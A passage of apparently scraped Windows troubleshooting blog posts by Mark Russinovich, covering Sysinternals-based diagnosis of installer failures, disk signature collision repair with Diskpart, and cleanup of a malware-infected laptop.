copied the log from my mom’s computer and opened both traces in separate windows, one on the top of the screen and one on the bottom. </P> <P> Scrolling through the traces in tandem, I was able to synchronize them simply by looking at the shapes that the operation paths make in the window and occasionally ensuring that they were indeed in sync by looking closely at a few operations. Though it was laborious, I progressed through the trace, at times losing sync but then gaining it back. One trace being from a clean system and the other with lots of software installed caused relatively minor differences I could discount. </P> <P> Finally after about 10 minutes, I found an operation that differed in what seemed to be a significant way: an open of the registry key HKCR\Installer\UpgradeCodes\11BB99F8B7FD53D4398442FBBAEF050F returned SUCCESS in the failing trace: </P> <P> <IMG alt="image" border="0" height="64" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/7506.image_5F00_thumb_5F00_11.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121396iE553484C5AF3B99B" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> but NAME NOT FOUND in the working one: </P> <P> <IMG alt="image" border="0" height="70" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/5342.image_5F00_thumb_5F00_10.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121397i403EDE8B70EB3D53" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> Another bit of the broken installation it seemed, but without any reference to MSE, so one that hadn’t shown up in my registry search. I deleted the key, and with some forced confidence told my brother-in-law that I had solved the problem. Then I crossed my fingers and launched the setup again, praying that it would work and I could get back to the holiday festivities that were in full swing downstairs. </P> <P> Bingo, the setup chugged along for a few seconds and finished by congratulating me on my successful install: </P> <P> <IMG alt="SNAGHTMLfe4b7cd" border="0" height="282" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/4265.SNAGHTMLfe4b7cd_5F00_thumb.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121398iACEBC7C8D7F49255" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="SNAGHTMLfe4b7cd" width="454" /> </P> <P> Another seemingly unsolvable problem conquered with Sysinternals, application of a few useful troubleshooting techniques, and some perseverance. My brother-in-law was suitably impressed and had a good story for when he returned to the office after the break, and my mother had a faster PC with free antimalware service. </P> <P> I followed up with the MSE team and they are working on improving the error codes and making the setup program more robust against these kinds of issues. They also pointed me at some additional resources in case you happen to run into the same kind of problem. First, there’s a Microsoft support tool, <A href="#" target="_blank"> MscSupportTool.exe </A> , that extracts the MSE installation log files, which might give some additional information. There’s also a <A href="#" target="_blank"> Microsoft ‘fix-it tool’ </A> that addresses some installation corruption problems. </P> <P> I hope that your holiday troubleshooting met with similar success and wish that your 2012 is free of computer problems! </P> </BODY></HTML> Thu, 27 Jun 2019 07:24:32 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-my-mom-8217-s-broken-microsoft-security-essentials/ba-p/724196 MarkRussinovich 2019-06-27T07:24:32Z The Case of the Installer Service Error https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-installer-service-error/ba-p/724144 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Nov 27, 2011 </STRONG> <BR /> <P> This case unfolds with a network administrator charged with the rollout of the <A href="#" target="_blank"> Microsoft Windows Intune </A> client software on their network. Windows Intune is a cloud service that manages systems on a corporate network, keeping their software up to date and enabling administrators to monitor the health of those systems from a browser interface. It requires a client-side agent, but on one particular system the client software failed to install, reporting this error message: </P> <P> <IMG alt="image" border="0" height="172" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/6278.image_5F00_thumb.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121380iAE67656B92A1CD35" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="284" /> </P> <P> The dialog’s error message translates to “The Windows Installer Service could not be accessed. This can occur if the Windows Installer is not correctly installed. Contact your support personnel for assistance.” </P> <P> The administrator, having seen one of my <A href="#" target="_blank"> Case of the Unexplained presentations </A> where I advised, “when in doubt, run Process Monitor,” downloaded <A href="#" target="_blank"> a copy from Sysinternals.com </A> and captured a trace of the failed install. He followed the standard troubleshooting technique of looking backward from the end of the trace for operations that might be the cause, but after about a half hour of analysis he gave up and switched to a different approach. Instead of looking for clues in the trace, he thought he might be able to find clues by comparing the trace of the failing system to another captured on a system where the client installed successfully. </P> <P> A few minutes later he had a second trace to compare side-by-side. He set a filter to include only events generated by Msiexec.exe, the client setup program, and proceeded through the events in the trace from the problematic system, correlating them with corresponding events on the working one. He eventually got to a point where the two traces diverged. Both traces have references to HKLM\System\CurrentControlSet\Services\BFE, but the failed trace then has registry queries of the ComputerName registry key: </P> <P> <IMG alt="image" border="0" height="100" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/7183.image_5F00_thumb_5F00_1.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121381iD94F1B3B66D45FAB" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> The working system’s trace, on the other hand, continues with operations from a new instance of Msiexec.exe, something he noticed because the process ID of the subsequent Msiexec.exe operations were different from the earlier ones: </P> <P> <IMG alt="image" border="0" height="93" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/1488.image_5F00_thumb_5F00_5.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121382i4EF38C1961A88BA3" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> It still wasn’t clear from the failed trace what caused the divergence, however. After pondering the situation for a few minutes he was just about to give up when the thought crossed his mind that the answer might lie in the operations that the filter was hiding. He deleted the filter he’d applied that included only events from Msiexec.exe from both traces and resumed comparing traces from the point of divergence. </P> <P> He immediately saw that the trace from the working system had many events from a Svchost.exe process that weren’t present in the failed trace. Working under the assumption that the Svchost.exe activity was unrelated, he added a filter to exclude it. Now the traces lined up again with events from Services.exe matching in both traces: </P> <P> <IMG alt="image" border="0" height="105" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/0334.image_5F00_thumb_5F00_4.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121383i5785D29A7563D51F" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> <IMG alt="image" border="0" height="112" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/4456.image_5F00_thumb_5F00_3.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121384i8BDB5B31CB28BF0E" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> The matching operations didn’t go on for very long, however. Only a dozen or so operations later the trace from the failing system had a reference to HKLM\System\CurrentControlSet\Services\Msiserver\ObjectName with a NAME NOT FOUND error: </P> <P> <IMG alt="image" border="0" height="86" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/6278.image_5F00_thumb_5F00_6.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121385iBF3EE66A55823F17" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> The trace from the working system had the same operation, but with a SUCCESS result: </P> <P> <IMG alt="image" border="0" height="107" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/1401.image_5F00_thumb_5F00_7.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121386i43EF0DFDBA726B20" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> Sure enough, right-clicking on the path and selecting “Jump to…” from Process Monitor’s context menu confirmed that not only was the ObjectName value missing from the failing system’s Msiserver key, but the entire key was empty. On the working system it was populated with the registry values required to configure a Windows service: </P> <P> <IMG alt="image" border="0" height="104" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/8345.image_5F00_thumb_5F00_9.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121388i6ACC41FBB8D012C5" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="432" /> </P> <P> Somehow the service registration for the MSI service had been corrupted, something the initial error dialog had stated but without guidance for how to fix the problem. And how the service had been corrupted would likely remain forever a mystery, but the important thing now was fixing it. To do so, he simply used Regedit’s export functionality to save the contents of the key from the working system to a .reg file and then imported the file to the corrupted system. After the import, he reran the Microsoft Intune installer and it succeeded without any issues. </P> <P> With the help of Process Monitor and some diligence, he’d spent about forty-five minutes fixing a problem that would have ended up costing him several hours if he’d had to reimage the system and restore its applications and configuration. </P> <P> You can find more tips on running Process Monitor, as well as additional illustrative troubleshooting cases, in my <A href="#" target="_blank"> Windows Sysinternals Administrator’s Reference </A> , a book I recently published with <A href="#" target="_blank"> Aaron Margosis </A> . If you’ve read it, please leave a review on <A href="#" target="_blank"> Amazon.com </A> . </P> </BODY></HTML> Thu, 27 Jun 2019 07:23:17 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-installer-service-error/ba-p/724144 MarkRussinovich 2019-06-27T07:23:17Z Fixing Disk Signature Collisions https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/fixing-disk-signature-collisions/ba-p/724114 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Nov 06, 2011 </STRONG> <BR /> <P> Disk cloning has become common as IT professionals virtualize physical servers using tools like <A href="#" target="_blank"> Sysinternals Disk2vhd </A> and use a master virtual hard disk image as the base for copies created for virtual machine clones. In most cases, you can operate with cloned disk images unaware that they have duplicate disk signatures. However, on the off chance you attach a cloned disk to a Windows system that has a disk with the same signature, you will suffer the consequences of disk signature collision, which renders unbootable any of the disk’s installations of Windows Vista and newer. Reasons for attaching a disk include offline injection of files, offline malware scanning , and - somewhat ironically - repairing a system that won’t boot. This risk of corruption is the reason that I warn in Disk2vhd’s documentation not to attach a VHD produced by Disk2vhd to the system that generated the VHD using the native VHD support added in Windows 7 and Windows Server 2008 R2. </P> <P> I’ve gotten emails from people that have run into the disk signature collision problem and see from a Web search that there’s little clear help for fixing it. So in this post, I’ll give you easy repair steps you can follow if you’ve got a system that won’t boot because of a disk signature collision. I’ll also explain where disk signatures are stored, how Windows uses them, and why a collision makes a Windows installation unbootable. </P> <H3> Disk Signatures </H3> <P> A disk signature is four-byte identifier <A href="#" target="_blank"> offset 0x1B8 in a disk’s Master Boot Record </A> , which is written to the first sector of a disk. This screenshot of a disk editor shows that the signature of my development system’s disk is 0xE9EB3AA5 (the value is stored in little-endian format, so the bytes are stored in reverse order): </P> <P> <IMG alt="image" border="0" height="146" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/6765.image_5F00_thumb_5F00_163542B1.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121369i15EC4D8C310E17F2" style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> Windows uses disk signatures internally to map objects like volumes to their underlying disks and starting with Windows Vista, Windows uses disk signatures in its Boot Configuration Database (BCD), which is where it stores the information the boot process uses to find boot files and settings. When you look at a BCD’s contents using the built-in Bcdedit utility, you can see the three places that reference the disk signature: </P> <P> <IMG alt="image" border="0" height="464" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/3731.image_5F00_thumb_5F00_21939A74.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121370iC8A5D5DFBF152B0D" style="background-image: none; border-right-width: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> The BCD actually has additional references to the disk signature in alternate boot configurations, like the Windows Recovery Environment, resume from hibernate, and the Windows Memory Diagnostic boot, that don’t show up in the basic Bcdedit output. Fixing a collision requires knowing a little about the BCD structure, which is actually a registry hive file that Windows loads under HKEY_LOCAL_MACHINE\BCD00000: </P> <P> <IMG alt="image" border="0" height="369" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/3324.image_5F00_thumb_5F00_3D38266A.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121371i090EE6F6E8092EAF" style="background-image: none; border-right-width: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="331" /> </P> <P> Disk signatures show up at offset 0x38 in registry values called Element under keys named 0x11000001 ( <A href="#" target="_blank"> Windows boot device </A> ) and 0x2100001 ( <A href="#" target="_blank"> OS load device </A> ): </P> <P> <IMG alt="image" border="0" height="190" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/2742.image_5F00_thumb_5F00_7D020CEF.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121372i83ABA5FD90BFB7D3" style="background-image: none; border-right-width: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="489" /> </P> <P> Here’s the element corresponding to one of the entries seen in the Bcdedit output, where you can see the same disk signature that’s stored in my disk’s MBR: </P> <P> <IMG alt="image" border="0" height="244" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/0268.image_5F00_thumb_5F00_55C7C3BA.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121373iDA77F3EC0D6EE02A" style="background-image: none; border-right-width: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="490" /> </P> <H3> Disk Signature Collisions </H3> <P> Windows requires the signatures to be unique, so when you attach a disk that has a signature equal to one already attached, Windows keeps the disk in “offline” mode and doesn’t read its partition table or mount its volumes. This screenshot shows how the Windows Disk Management administrative utility presents an offline disk that I caused when I attached the VHD Disk2vhd created for my development system to that system: </P> <P> <IMG alt="image" border="0" height="131" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/3125.image_5F00_thumb_5F00_55FF2936.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121374iEB8568F149D31B91" style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="537" /> </P> <P> If you right-click on the disk, the utility offers an “Online” command that will cause Windows to analyze the disk’s partition table and mount its volumes: </P> <P> <IMG alt="image" border="0" height="138" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/0576.image_5F00_thumb_5F00_7CCD3F76.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121375i31D7558FD2E677BA" style="background-image: none; border-right-width: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="238" /> </P> <P> When you chose the Online menu option, Windows will without warning generate a new random disk signature and assign it to the disk by writing it to the MBR. It will then be able to process the MBR and mount the volumes present, but when Windows updates the disk signature, the BCD entries become orphaned, linked with the previous disk signature, not the new one. The boot loader will fail to locate the specified disk and boot files when booting from the disk and give up, reporting the following error: </P> <P> <IMG alt="image" border="0" height="416" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/1565.image_5F00_thumb_5F00_3C9725FC.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121376i61D7BA41571114A3" style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="554" /> </P> <H3> Restoring a&nbsp; Disk Signature </H3> <P> One way to repair a disk signature corruption is to determine the new disk signature Windows assigned to the disk, load the disk’s BCD hive, and manually edit all the registry values that store the old disk signature. That’s laborious and error-prone, however. In some cases, you can use Bcdedit commands to point the device elements at the new disk signature, but that method doesn’t work on attached VHDs and so is unreliable. Fortunately, there’s an easier way. Instead of updating the BCD, you can give the disk its original disk signature back. </P> <P> First, you have to determine the original signature, which is where knowing a little about the BCD becomes useful. Attach the disk you want to fix to a running Windows system. It will be online and Windows will assign drive letters to the volumes on the disk, since there’s no disk signature collision. Load the BCD off the disk by launching Regedit, selecting HKEY_LOCAL_MACHINE, and choosing Load Hive from the File menu: </P> <P> <IMG alt="image" border="0" height="244" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/6765.image_5F00_thumb_5F00_74D59D14.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121377iFAD90BB820103157" style="background-image: none; border-right-width: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="269" /> </P> <P> Navigate to the disk’s hidden \Boot directory in the file dialog, which resides in the root directory of one of the disk’s volumes, and select the file named “BCD”. If the disk has multiple volumes, find the Boot directory by just entering x:\boot\bcd, replacing the “x:” with each of the volume’s drive letters in turn. When you’ve found the BCD, pick a name for the key into which it loads, select that key, and search for “Windows Boot Manager”. You’ll find a match under a key named 12000004, like this: </P> <P> <IMG alt="image" border="0" height="127" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/6052.image_5F00_thumb_5F00_7816FEF1.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121378i714E0F7D6D420995" style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="347" /> </P> <P> Select the key named 11000001 under the same Elements parent key and note the four-byte disk signature located at offset 0x38 (remember to reverse the order of the bytes). </P> <P> With the disk signature in hand, open an administrative command prompt window and run Diskpart, the command-line disk management utility. Enter “select disk 2”, replacing “2” with the disk ID that the Disk Management utility shows for the disk. Now you’re ready for the final step, setting the disk signature to its original value with the command “uniqueid disk id=e9eb3aa5”, substituting the ID with the one you saw in the BCD: </P> <P> <IMG alt="image" border="0" height="45" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/6763.image_5F00_thumb_5F00_5B6D99DA.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121379iA4103FD4A40F8C80" style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="349" /> </P> <P> When you execute this command, Windows will immediately force the disk and its corresponding volumes offline to avoid a signature collision. Avoid bringing the disk online again or you’ll undo your work. You can now detach the disk and because the disk signature matches the BCD again, Windows installations on the disk will boot successfully. You might find yourself in a situation where you have no choice but to cause a collision and have Windows update a disk signature, but at least now you know how to repair it when you do. </P> <P> You can find out more about Disk2vhd in the <A href="#" target="_blank"> Sysinternals Administrator’s Reference </A> by me and Aaron Margosis. </P> </BODY></HTML> Thu, 27 Jun 2019 07:22:16 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/fixing-disk-signature-collisions/ba-p/724114 MarkRussinovich 2019-06-27T07:22:16Z The Case of the Mysterious Reboots https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-mysterious-reboots/ba-p/724100 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Oct 02, 2011 </STRONG> <BR /> <P> This case opens when a Sysinternals power user, who also works as a system administrator at a large corporation, had a friend report that their laptop had become unusable. Whenever the friend connected it to a network, their laptop would reboot. The power user, upon getting hold of the laptop, first verified the behavior by connecting it to a wireless network. The system instantly rebooted, first into safe mode, then again back into a normal Windows startup. He tried booting the laptop into safe mode directly, hoping that whatever was causing the problem would be inactive in that mode, but logging on only resulted in an automatic logoff. Returning to a normal boot, he noticed that <A href="#" target="_blank"> Microsoft Security Essentials </A> (MSE) was installed and tried to launch it. Double-clicking the icon had no effect, however, and double-clicking its entry in the Programs and Features section of the Control Panel resulted in an error message: </P> <P> <IMG alt="image" border="0" height="170" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/7563.image46_5F00_thumb.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121359i70603E6A7F04519B" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="354" /> </P> <P> Hovering his mouse over the MSE icon in the start menu gave the explanation: the link was pointing at a bogus location likely created by malware: </P> <P> <IMG alt="image" border="0" height="290" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/8244.image51_5F00_thumb.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121360iF867DA884D1B19FF" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="354" /> </P> <P> Because he couldn’t get to the network, he couldn’t easily repair the corrupted MSE installation. Wondering if the Sysinsternals tools might help, he copied <A href="#" target="_blank"> Process Explorer </A> and <A href="#" target="_blank"> Autoruns </A> to a USB key, and then copied them from the key to the laptop, which he was now convinced was infected. Launching Process Explorer, he was greeted with the following process tree: </P> <P> <IMG alt="image" border="0" height="513" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/6862.image_5F00_thumb_5F00_15.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121361i82E4943871B6226B" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> In my Blackhat presentation, <A href="#" target="_blank"> Zero Day Malware Cleaning with the Sysinternals Tools </A> , I present a list of characteristics commonly exhibited by malicious processes. They include having no icon, company name, or description, residing in the %Systemroot% or %Userprofile% directories, and being “packed” (encrypted or compressed). While there’s a class of sophisticated malware that doesn’t have any of these attributes, most malware still does. This case is a great example. Process Explorer looks for the signatures of common executable compression tools like <A href="#" target="_blank"> UPX </A> , as well as heuristics that include Portable Executable image layouts used by compression engines, and highlights matches in a “packed” highlight color. The default color, fuchsia, is visible on about a dozen processes in the process view. Further, every single one of the highlighted processes lacks a description and company name (though a few have icons). </P> <P> Many of them also have names that are the same, or similar to, legitimate Windows system executables. The one highlighted below has a name that matches the Windows <A href="#" target="_blank"> Svchost.exe </A> executable, but has an icon (borrowed from Adobe Flash) and resides in a nonstandard directory, C:\Windows\Update.1: </P> <P> <IMG alt="image" border="0" height="149" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/5710.image_5F00_thumb_5F00_16.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121362iD14B2CD3F163BD7D" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="404" /> </P> <P> Another process with a name not matching that of any Windows executable, but whose name, Svchostdriver.exe, is similar enough to confuse someone not intimately familiar with Windows internals, actually has TCP/IP sockets listening for connections, presumably from a botmaster: </P> <P> <IMG alt="image" border="0" height="123" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/0435.image_5F00_thumb_5F00_19.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121363i6728ED6482E50FDE" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> There was no question that the computer was severely infected. Autoruns revealed malware using several different activation points, and explained that the reason even Safe Mode with Command Prompt didn’t work properly was because a bogus executable called Services32.exe (another legitimate-looking name) had registered as the Safe Mode AlternateShell, which is by default Cmd.exe (command prompt): </P> <P> <IMG alt="image" border="0" height="416" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/4834.image_5F00_thumb.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121364iA6F673AC6773BBC2" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> My recommendation for cleaning malware is to first leverage antimalware utilities if possible. Antimalware might address some or all of an infection, so why do work if you don’t have to? But this system couldn’t connect to the Internet, preventing easily repairing the MSE installation or downloading other antimalware like the <A href="#" target="_blank"> Microsoft Malicious Software Removal Tool </A> (MSRT). The power user had seen me use the Process Explorer suspend functionality at a conference to suspend malware processes in order to prevent them from restarting each other when someone trying to clean the system terminates one. Maybe if he suspended all the processes that looked malicious he’d be able to connect to the network without having the system reboot? It was worth a shot. </P> <P> Right-clicking on each malicious process in turn, he selected Suspend from the context menu to put the process into a state of limbo: </P> <P> <IMG alt="image" border="0" height="244" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/3568.image_5F00_thumb_5F00_21.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121365i33F704486F77C54A" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="192" /> </P> <P> When he was done, the process tree looked like this, with suspended processes colored grey: </P> <P> <IMG alt="image" border="0" height="504" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/8546.image_5F00_thumb_5F00_22.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121366i27B52A6827828BCD" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> Now to see if the trick worked: he connected to the wireless network. Bingo, no reboot. Now connected to the Internet, he proceeded to download MSE, install it, and perform a thorough scan of the system. The engine cranked along, reporting discovered infections as it went. When it finished, it had found four separate malware strains, <A href="#" target="_blank"> Trojan:Win32/Teniel </A> , <A href="#" target="_blank"> Backdoor:Win32/Bafruz.C </A> , <A href="#" target="_blank"> Trojan:Win32/Malex.gen!E </A> , and <A href="#" target="_blank"> Trojan:Win32/Sisron </A> : </P> <P> <IMG alt="image" border="0" height="92" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/0842.image_5F00_thumb_5F00_23.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121367i12135F046DF73652" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="244" /> </P> <P> After rebooting, which was noticeably faster than before, he connected to the network without trouble. As a final check, he launched Process Explorer to see if any suspicious processes remained. To his relief, the process tree looked clean: </P> <P> <IMG alt="image" border="0" height="578" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/8546.image_5F00_thumb_5F00_25.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121368i5D2085844FC907BB" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> Another case solved with the help of the Sysinternals tools! The new <A href="#" target="_blank"> Windows Sysinternals Administrator’s Reference </A> , authored by Aaron Margosis and me, covers all the tools and their features in detail, giving you the tools and techniques required to solve problems related to sluggish performance, misleading error messages, and application crashes. And if you’re interested in cyber-security, be sure to get a copy of my technothriller <A href="#" target="_blank"> Zero Day </A> . </P> </BODY></HTML> Thu, 27 Jun 2019 07:20:57 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-mysterious-reboots/ba-p/724100 MarkRussinovich 2019-06-27T07:20:57Z The Case of the Hung Game Launcher https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-hung-game-launcher/ba-p/724089 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Jul 18, 2011 </STRONG> <BR /> <P> I love the cases people send me where the <A href="#" target="_blank"> Sysinternals </A> tools have helped them successfully troubleshoot, but nothing is more satisfying than using them to solve my own cases. This case in particular was fun because, well, solving it helped me get back to having fun. </P> <P> When I have time, I occasionally play PC games to let off steam (pun intended, as you’ll see). One of 